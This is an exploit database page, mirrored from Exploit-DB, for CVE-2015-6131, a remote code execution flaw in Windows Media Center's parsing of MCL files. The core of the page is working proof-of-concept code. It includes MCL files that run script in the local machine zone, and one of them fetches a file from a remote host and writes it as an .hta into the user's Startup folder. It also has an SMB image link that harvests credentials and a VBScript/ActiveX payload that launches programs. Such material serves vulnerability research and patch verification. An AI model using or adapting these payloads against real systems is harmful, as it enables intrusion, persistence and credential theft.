Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Microsoft Windows Media Center Library - Parsing Remote Code Execution aka 'self-executing' MCL File

🗓️ 09 Dec 2015 00:00:00Reported by Eduardo Braun PradoType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 45 Views

Windows Media Center Library RCE Vulnerability, "self-executing" MCL file CVE-2015-613

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Microsoft Windows Media Center Library Parsing RCE Vulnerability aka "self-executing" MC
9 Dec 201500:00
zdt
CNVD		Microsoft Windows Media Center Library Analysis RCE Vulnerability
9 Dec 201500:00
cnvd
Check Point Advisories		Microsoft Windows Media Center Remote Code Execution (MS15-134: CVE-2015-6131)
8 Dec 201500:00
checkpoint_advisories
CVE		CVE-2015-6131
9 Dec 201511:00
cve
Cvelist		CVE-2015-6131
9 Dec 201511:00
cvelist
exploitpack		Microsoft Windows Media Center Library - Parsing Remote Code Execution aka self-executing MCL File
9 Dec 201500:00
exploitpack
Kaspersky		KLA10714 Multiple vulnerabilities in Microsoft Windows
8 Dec 201500:00
kaspersky
Kaspersky		 KLA10715Multiple vulnerabilities in Microsoft Windows Media Center
8 Dec 201500:00
kaspersky
NVD		CVE-2015-6131
9 Dec 201511:59
nvd
OpenVAS		Microsoft Windows Media Center Remote Code Execution Vulnerability (3108669)
9 Dec 201500:00
openvas
Rows per page
Title: Microsoft Windows Media Center Library Parsing RCE Vuln aka "self-executing" MCL file (CVE-2015-6131)

Software Vendor: Microsoft

Software version : MS Windows Media Center latest version on any Windows OS.

Software Vendor Homepage: http://www.microsoft.com

CVE: CVE-2015-6131

Exploit Author: Eduardo Braun Prado

Vulnerability oficial discoverer: Zhang YunHai of NSFOCUS Security Team

date: december 8, 2015

Vulnerability description:

Windows Media Center contains a remote code execution vulnerability because it allows "MCL" files to reference themselves as HTML pages, which will be parsed inside Windows Media Center window, in the context of the local machine security zone of Internet Explorer browser. This in turn allows execution of arbitrary code using eg. ADO ActiveX Objects. AKA "self-executing" MCL files.


exploit code below:

----------- self-exec-1.mcl ------------------------------------

<application url="self-exec1.mcl"/><html><script>alert(' I am running in local machine zone which allows arbitrary code execution via, for example, ADO Objects')</script></html>

------------------------------------------------------------

----------self-exec-2.mcl--------------------------------------

<application url="self-exec2.mcl"/><html><b>Use a sniffer software to sniff SMB traffic and retrieve the remote Windows username required for this exploit</b><img src=\\192.168.10.10\smbshare\someimg.jpg></img><script> RecordsetURL='http://192.168.10.10:80/recordsetfile.txt'; var rs = new ActiveXObject('ADODB.recordset'); rs.Open(RecordsetURL); rs.Save('C:/users/windowsuser/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/poc.hta'); rs.Close();
</script></html>
----------------------------------------------------------

-----Create-recordsetfile.hta --------------

<html><body onload="aa()">

<script language="VBScript">

function aa()


defdir="."

alert "This script will retrieve data from ""recordsetdata.txt"" and save it to the current directory as ""recordsetfile.txt"". 




Set c = CreateObject("ADODB.Connection")
co = "Driver={Microsoft Text Driver (*.txt; *.csv)};DefaultDir=" & defdir & ";Extensions=txt;"
c.Open co
set rs =CreateObject("ADODB.Recordset")
rs.Open "SELECT * from recordsetdata.txt", c
al=rs.Save(defdir & "\recordsetfile.txt")
rs.close

end function
</script></body></html>

-------------------------------------------------------------------------------


---------recordsetdata.txt------------------------------------------

<html>
<script>a=new ActiveXObject('Wscript.Shell')</script>
<script>a.Run('calc.exe',1);</script>
</html>
-------------------------------------------------------------------

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
09 Dec 2015 00:00Current
7High risk
Vulners AI Score7
CVSS 29.3
EPSS0.59019
microsoftwindows media centerremote code executionmcl filecve-2015-6131vulnerabilityexploitactivex objectsinternet explorerhtml pagessmb trafficrecordsetfile.hta
45